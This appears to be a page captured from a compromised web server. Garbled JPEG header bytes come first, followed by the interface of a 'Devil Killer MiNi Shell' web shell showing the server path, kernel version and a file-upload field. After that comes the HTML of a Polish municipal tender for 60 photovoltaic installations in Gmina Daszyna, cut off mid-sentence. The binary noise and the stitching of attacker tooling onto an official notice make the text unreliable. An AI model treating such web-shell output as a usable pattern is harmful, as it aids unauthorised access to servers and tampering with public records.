JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230720/0031601301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Instalacje ogniw fotowoltaicznych na terenie Gminy Daszyna </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DASZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015885</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">34A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Daszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-107</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 3571000</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 3890400</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminadaszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.daszyna.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Instalacje ogniw fotowoltaicznych na terenie Gminy Daszyna </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f84d534a-25fb-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00316013</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00092770/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Instalacje ogniw fotowoltaicznych na terenie Gminy Daszyna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt jest dofinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020, Oś Priorytetowa IV Gospodarka Niskoemisyjna, Działanie IV.1 Odnawialne źródła energii, Poddziałanie IV.1.2 Odnawialne źródła energii. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f84d534a-25fb-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu środków komunikacji elektronicznej. <br/>2.	Komunikacja ustna zgodnie z SWZ.<br/>3.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej.<br/>4.	Komunikacja elektroniczna za pomocą poczty elektronicznej nie dotyczy składania ofert oraz dokumentów składanych wraz z ofertą. <br/>5.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>6.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia) oraz Identyfikator (ID) postępowania na platformie e-Zamówienia znajdują się w Załączniku Nr 12 do niniejszej SWZ. Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (wybierając przycisk „Przeglądaj postępowania/konkursy”).<br/>7.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>8.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>9.	Sposób i forma sporządzenia dokumentów elektronicznych zgodnie z SWZ. 10.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych zgodnie z SWZ.<br/>11.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej zgodnie z SWZ.<br/>12.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>13.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zbigniew.cywinski@gminadaszyna.pl (nie dotyczy składania ofert). <br/>14.	W przypadku załączników zgodnie z SWZ. <br/>15.	Wykaz poszczególnych informacji, dokumentów i oświadczeń składanych w postępowaniu oraz ich forma, sposób sporządzania i przekazywania zostały określone przez Zamawiającego w rozdziale 21 SWZ. <br/>16.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” zgodnie z SWZ. <br/>17.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>18.	Maksymalny rozmiar plików zgodnie z SWZ. <br/>19.	Minimalne wymagania techniczne zgodnie z SWZ. <br/>20.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej „RODO”, Zamawiający informuje, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Gmina Daszyna reprezentowana przez Wójta Gminy Daszyna z siedzibą w Daszynie, Daszyna 34A, 99-107 Daszyna;<br/>2)	Administrator wyznaczył Inspektora Ochrony Danych – Pan/i Ewelina Witosławska, z którym można skontaktować się pod adresem e-mail: iod@gminadaszyna.pl oraz telefonicznie pod nr telefonu 24 357-10-00. <br/>3)	Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO oraz na podstawie przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t. j. Dz. U. z 2022 r. poz. 1710 z późn. zm.), w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego. Po ustaniu celu pierwotnego dane będą przetwarzane w celach archiwalnych, kontrolnych na podstawie art. 6 ust. 1 lit. c RODO w zw. z właściwymi przepisami szczególnymi. W przypadku zawarcia umowy – dane będą również przetwarzane w celach wypełniania obowiązków prawnych ciążących na Administratorze związanych z rachunkowością, podatkami, archiwizacją na podstawie art. 6 ust. 1 lit. c RODO w zw. właściwymi przepisami szczególnymi oraz art. 6 ust. 1 lit. b RODO. <br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; dane mogą zostać również powierzone tzw. podmiotom przetwarzającym, które dostarczają usług niezbędnych do realizacji zamówienia, na podstawie odpowiednich instrumentów prawnych (np. firma hostingowa, informatyczna, z zakresu ochrony danych osobowych), a także udostępnione podmiotom, które zwracają się o udostępnienie danych w trybie ustawy o dostępie do informacji publicznej; organom władzy publicznej oraz podmiotom wykonującym zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa. <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność, jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>6)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>7)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych zgodnie z SWZ.<br/>b)	na podstawie art. 16 RODO prawo do sprostowania / uzupełnienia zgodnie z SWZ.<br/>c)	prawo do usunięcia danych – zgodnie z SWZ. <br/>d)	prawo do przenoszenia danych osobowych – zgodnie z SWZ. <br/>e) prawo wniesienia sprzeciwu wobec przetwarzania – zgodnie z SWZ. <br/>f)	prawo do wniesienia skargi zgodnie z SWZ. <br/>8)	Zgodnie z SWZ. <br/>Informacje dodatkowe z art. 14 RODO – zgodnie z SWZ. <br/>9), 10), 11), 12), 13) zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (*Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego). W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania (art. 19 ust. 3 ustawy Pzp).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowi zaprojektowanie, dostawa, montaż i uruchomienie 60 szt. instalacji fotowoltaicznych, w ramach projektu inwestycyjnego pn. „Instalacje ogniw fotowoltaicznych na terenie Gminy Daszyna”.<br/> Przedmiotem zamówienia jest zaprojektowanie, dostawa oraz montaż i uruchomienie 60 kompletów fabrycznie nowych instalacji fotowoltaicznych na/w wybranych nieruchomościach/budynkach mieszkalnych, jednorodzinnych na terenie Gminy Daszyna o rozmiarze wskazanym w poniższym zestawieniu:<br/>Moc instalacji (w kW) - 3,0 kW - 54 szt.;<br/>2,0 kW - 6 szt.	<br/>2.	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA <br/>Szczegółowy opis przedmiotu zamówienia określa PFU, który stanowi załącznik nr 10 do SWZ.<br/>Wyceny poszczególnych instalacji PV należy dokonać na załączniku nr 1 do SWZ. Przy wyborze mocy paneli PV należy kierować się zasadą, że moc dobranej instalacji nie może być mniejsza, od mocy wskazanej w załączniku nr 1a (zasada zaokrąglania mocy w górę).<br/>Dopuszcza się dobór ogniw fotowoltaicznych o mocy od 440W do 550W. <br/>UWAGA: Przy kalkulacji ceny ofertowej należy bazować na dokumentach określających zakres przedmiotu zamówienia tj. Specyfikacji Warunków Zamówienia oraz Programie Funkcjonalno-Użytkowym.<br/>2.1.	Zakres przedmiotu zamówienia - Zaprojektowanie, dostawa, montaż i uruchomienie 60 szt. instalacji fotowoltaicznych – obejmuje w szczególności:<br/>1)	przeprowadzenie wizji lokalnych oraz weryfikację aktualnych mocy przyłączeniowych i na ich podstawie wykonanie w 2 egz. wielobranżowej dokumentacji projektowej, dalej zwaną dokumentacją projektową, odrębnie dla każdej nieruchomości wymienionej w zestawieniu stanowiącym załącznik 1a do SWZ oraz w wersji elektronicznej na nośniku pendrive, zgodnie z przepisami i obowiązującymi Polskimi i Europejskimi Normami, zasadami wiedzy technicznej oraz poprzedzonej uzgodnieniami z Zamawiającym (uzyskanie akceptacji inspektora nadzoru inwestorskiego, który reprezentować będzie Zamawiającego),<br/>2)	uzyskanie wszelkich wymaganych opinii, uzgodnień projektowych oraz decyzji, w zakresie wynikającym z przepisów, jeżeli odrębne przepisy obowiązek taki będą nakładać w tym uzgodnień z rzeczoznawcą ds. p. pożarowych pod względem zgodności z wymaganiami ochrony przeciwpożarowej montażu instalacji urządzeń fotowoltaicznych o mocy zainstalowanej elektrycznej większej niż 6,5 kW (dotyczy sytuacji, w której przy uwzględnieniu istniejącej instalacji fotowoltaicznej, łączna moc zainstalowanych instalacji fotowoltaicznych - zamontowanej w ramach realizacji przedmiotu niniejszej umowy oraz istniejącej, w danej lokalizacji przekracza 6,5 kW),<br/>3)	uzyskanie wymaganych przepisami Prawa Budowlanego uzgodnień i pozwoleń na realizację projektu, jeżeli odrębne przepisy obowiązek taki będą nakładać, w szczególności uzyskanie ostatecznej decyzji o pozwoleniu na budowę w zakresie przedmiotu zamówienia i/lub zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę (brak sprzeciwu organu architektoniczno-urbanistycznego), jeżeli z odrębnych przepisów wynika konieczność ich uzyskania,<br/>4)	szczegółowe określenie w dokumentacji projektowej sposobu montażu instalacji PV z uwzględnieniem obowiązujących norm i standardów technicznych oraz uwzględnieniem warunków technicznych w miejscu montażu,<br/>5)	wykonanie dostawy, montażu oraz uruchomienie 60 szt. instalacji fotowoltaicznych, zgodnie z zatwierdzoną listą lokalizacji montażu instalacji fotowoltaicznych dołączoną do zatwierdzonego harmonogramu rzeczowo-finansowego, w oparciu o opracowaną i zatwierdzoną dokumentację projektową,<br/>6)	integrację instalacji fotowoltaicznej z istniejącą instalacją elektryczną,<br/>7)	montaż falowników umożliwiających w sposób bezprzewodowy (WiFi) lub LAN na przesyłanie informacji dotyczących parametrów pracy instalacji fotowoltaicznej, przede wszystkim produkcji energii elektrycznej, tak aby Zamawiający miał możliwość przygotowania raportów z produkcji energii przez źródło wytwórcze. Aplikacja monitorująca dostępna na telefon/komputer, przedstawiająca podstawowe parametry pracy:<br/>a)	Uzyski instalacji dzienne, miesięczne, roczne;<br/>b)	Możliwość podglądu produkcji energii z poszczególnych dni;<br/>c)	Możliwość wygenerowania produkcji energii z zadanego okresu z instalacji PV do pliku;<br/>d)	Możliwość wygenerowania całkowitej produkcji energii z zadanego okresu wszystkich instalacji podłączonych do danego konta; <br/>e)	Parametry inwertera w tym moc, napięcie, prąd – strona DC/AC z możliwością przedstawienia danych na wykresie;<br/>f) Zapisywanie błędów inwertera;<br/>g)	Możliwość utworzenia konta „Administratora” pozwalającego Wykonawcy/Inwestorowi na podgląd wszystkich zamontowanych instalacji fotowoltaicznych.<br/>8)	wykonanie niezbędnych robót towarzyszących w tym m.in. rozbiórki i odtworzenia nawierzchni, wykonanie robót ziemnych, odtworzenie terenu do stanu pierwotnego oraz pozostałych prac instalacyjnych, budowlanych i montażowych niezbędnych do prawidłowego wykonania przedmiotu umowy oraz prawidłowego funkcjonowania instalacji fotowoltaicznych,<br/>9)	wykonania/zamurowania otworów montażowych w celu wprowadzenia urządzeń, <br/>10)	wykonanie geodezyjnej inwentaryzacji powykonawczej obiektów w przypadku, gdy na podstawie odrębnych przepisów będzie konieczność jej uzyskania do prawidłowo przeprowadzonego odbioru końcowego przedmiotu umowy,<br/>11)	sprawowanie nadzoru autorskiego,<br/>12)	przygotowanie i przekazanie użytkownikom końcowym instrukcji korzystania z zamontowanych instalacji (zawierające m.in. zalecenia bieżącej konserwacji) oraz uzyskanie pisemnego oświadczenia o otrzymaniu instrukcji przez użytkownika, które należy dołączyć do dokumentacji powykonawczej,<br/>13)	przeprowadzenie szkolenia dla wszystkich użytkowników montowanych instalacji w zakresie sposobu ich użytkowania oraz przygotowanie i przekazanie w wersji papierowej instrukcji obsługi i eksploatacji, sporządzenie protokołu z przeprowadzonego szkolenia oraz uzyskanie pisemnego oświadczenia użytkownika o dokonanym szkoleniu, które należy dołączyć do dokumentacji powykonawczej,<br/>14)	opracowanie i przekazanie Zamawiającemu dokumentacji powykonawczej w 2 egz. w wersji papierowej, elektronicznej (PDF i edytowalnej) na nośniku pendrive dla każdej instalacji fotowoltaicznej.<br/>15)	Wykonawca zobowiązany jest do dopełnienia, w imieniu Zamawiającego, wszelkich wymogów prawnych upoważniających do rozpoczęcia robót, zgodnie z odnośnymi przepisami prawa obowiązującymi w dacie podejmowania poszczególnych czynności prawnych.<br/>16)	Wykonawca jest zobowiązany wykonać Przedmiot niniejszej umowy zgodnie z zasadami sztuki budowlanej i wiedzy technicznej, obowiązującymi przepisami, normami i uzgodnieniami branżowymi, przy dołożeniu należytej staranności, wymaganej w stosunkach danego rodzaju od podmiotów zawodowo wykonujących prace objęte zakresem Przedmiotu niniejszej umowy. <br/>17)	Wykonawca po wykonaniu dostawy i zakończeniu robót zobowiązany jest do trwałego uszczelnienia wszystkich przejść instalacji przez przegrody budowlane oraz przywrócenia pomieszczeń i terenu do stanu pierwotnego, w każdej lokalizacji, w tym do odtworzenia wszelkich naruszonych powierzchni, elementów konstrukcyjnych oraz innych elementów uszkodzonych bądź naruszonych w wyniku montażu instalacji fotowoltaicznej w ramach wynagrodzenia za całość przedmiotu umowy oraz uzyskania od użytkownika pisemnego protokołu potwierdzającego powyższe.<br/>18)	Wykonawca zobowiązany jest do pomocy przy przeprowadzeniu pełnej procedury wymaganej dla podłączenia i uruchomienia instalacji, w tym przygotowania i przekazania użytkownikom wymaganych dokumentów dla montażu liczników dwukierunkowych oraz zgłoszenia przyłączenia instalacji fotowoltaicznej do Operatora Systemu Dystrybucyjnego, w terminie do 30.11.2023 r., o czym Wykonawca zobowiązany jest poinformować na piśmie Zamawiającego.<br/>19)	Wykonawca zobowiązany jest dla każdej instalacji fotowoltaicznej o mocy powyżej 6,5 kW do przedłożenia pełnej dokumentacji do złożenia zawiadomienia Państwowej Straży Pożarnej <br/>o zakończeniu budowy obiektu budowlanego i zamiarze przystąpienia do jego użytkowania. Obowiązek Wykonawcy, o którym mowa w zdaniu poprzednim, dotyczy sytuacji, w której przy uwzględnieniu istniejącej instalacji fotowoltaicznej, łączna moc zainstalowanych instalacji fotowoltaicznych (zamontowanej w ramach realizacji przedmiotu niniejszej umowy oraz istniejącej) w danej lokalizacji przekracza 6,5 kW. <br/>20)	Wykonawca zobowiązany jest do bieżącego uzgadniania opracowań projektowych i uzyskiwania akceptacji Zamawiającego oraz do przedłożenia Zamawiającemu opracowanej dokumentacji projektowej do zatwierdzenia. Brak konsultacji i uzgodnień przyjętych rozwiązań w dokumentacji projektowej uprawnia Zamawiającego do żądania wprowadzenia zmian w dokumentacji na każdym etapie realizowanej inwestycji na ryzyko i koszt Wykonawcy.<br/>21)	Wszystkie oferowane urządzenia (m.in. panele fotowoltaiczne, inwertery i inne urządzenia) powinny być́ fabrycznie nowe, wyprodukowane nie wcześniej niż̇ 10 miesięcy przed 